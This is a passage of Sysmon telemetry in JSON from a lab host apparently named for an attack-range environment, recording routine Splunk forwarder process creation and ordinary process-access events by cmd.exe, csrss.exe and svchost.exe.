MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-1106-5F25-0000-00106CAA0500}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.780","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-00102DAB0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-1106-5F25-0000-00106CAA0500}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-00106CAA0500}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4992\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00102DAB0500}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-00106CAA0500}","SourceProcessId":"4984","SourceThreadId":"4992","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00102DAB0500}","TargetProcessId":"4912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00102DAB0500}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00102DAB0500}","TargetProcessId":"4912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
